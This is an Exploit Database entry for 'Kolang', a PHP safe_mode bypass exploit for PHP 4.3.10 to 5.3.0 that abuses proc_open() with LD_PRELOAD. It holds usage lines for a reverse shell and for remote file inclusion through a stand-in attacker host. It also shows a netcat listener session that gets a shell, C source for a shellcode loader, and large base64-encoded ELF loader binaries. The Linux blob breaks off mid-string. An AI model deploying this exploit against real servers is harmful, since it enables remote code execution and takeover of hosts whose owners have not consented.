Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass

• Exploit Database
• 5 阅读

• 作者： Hamid Ebadi
  日期： 2010-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11636/

• <?php
  /*
  Kolang (PHP Safe mode bypass)
  (IHSteam priv8 for lazy penetration testers)
  
  (php 4.3.10 - 5.3.0)
  http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018(12/19/2009)
  http://www.milw0rm.com/exploits/7393 (12/09/2008)
  
  1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
  2- Kolang can execute arbitrary shellcode (just for fans of metasploit )
  
  ~~~~ How to use:)
  
  for linux:
  	kolang.php?os=linux&host=LHOST&port=LPORT
  	or 
  	kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
  
  for freebsd:
  	kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE
  
  file inclusion :
  	http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT
  
  
  http://localhost/kolang.php?host=localhost&port=2121
  hamid@bugtraq ~ $ nc -vv -l -p 2121
  listening on [any] 2121 ...
  connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
  id
  uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
  
  
  Hamid Ebadi
  http://www.bugtraq.ir
  contact : ebadi~bugtraq~ir
  
  Kolang means pickaxe (the idea came from amnafzar naming convention)
  (Separ, Sarand, Alak, Skort)
  */
  
  
  $port= intval($_REQUEST['port']);
  $host= $_REQUEST['host'];
  $os= $_REQUEST['os'];
  
  /*
  
  
  //compile : cc -o shellcode.so -fPIC -shared shellcode.c
  //
  //<?php
  //$data=file_get_contents('shellcode.so');
  //file_put_contents('shellcode_base64.txt',$data);
  //?>
  
  
  
  
  // "shellcode loader" : load and execute arbitrary shellcode from a file
  // Hamid Ebadi
  #define O_RDONLY 00 ; fcntl.h
  #define SHELLCODE_MAX_SIZE 1024
  // change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
  #define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
  
  void getuid()
  {
  	unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
  	int fd;
  	char shellcode[SHELLCODE_MAX_SIZE];
  	char filename[]=SHELLCODE_FILENAME ;
  	// we can also pass the shellcode in program's arguments
  	if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
  	exit(1);
  	}
  	if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
  	exit(1);
  	}
  	(*(void(*)()) shellcode)();
  }
  
  */
  
  if ($_REQUEST['os']=='freebsd'){
  // freebsd shellcode loader (x86)
  $shellcode_loader=
  "f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA
  AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ
  AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA
  ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA
  AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB
  AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA
  AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA
  AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA
  AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA
  AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA
  AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU
  BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA
  AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA
  AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA
  aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf
  VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv
  AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu
  dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA
  0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8
  GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA
  AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo
  EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////
  /6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1
  WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw
  AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD
  OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN
  g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//
  UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5
  CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///
  /9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0
  W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx
  LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT
  VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv
  MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA
  lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR
  AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA
  AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH
  TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g
  MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z
  dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu
  aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA
  LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA
  AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA
  ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA
  CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU
  BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA
  AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA
  AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA
  AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj
  AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH
  AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA
  AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA
  oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA
  AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA
  AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA
  AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA
  CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA
  AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA
  AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA
  AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY
  GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA
  EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA
  AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/
  AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA
  AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA
  AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA
  AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA
  7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE
  APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA
  AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx
  /1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA
  AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf
  AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA
  AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91
  c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A
  Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f
  AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj
  dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf
  X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs
  Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh
  X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz
  X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A
  X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A";
  }else{
  // default: linux
  // linux shellcode loader (x86)
  $shellcode_loader=
  "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
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA
  XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW
  AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA
  AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA
  3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH
  Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0
  LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt
  cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z
  eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA
  LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k
  eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA
  BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC
  AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA
  AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA
  AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA
  IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI
  AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD
  AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA
  ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA
  AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA
  AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A
  AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A
  AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA
  CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0
  HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA
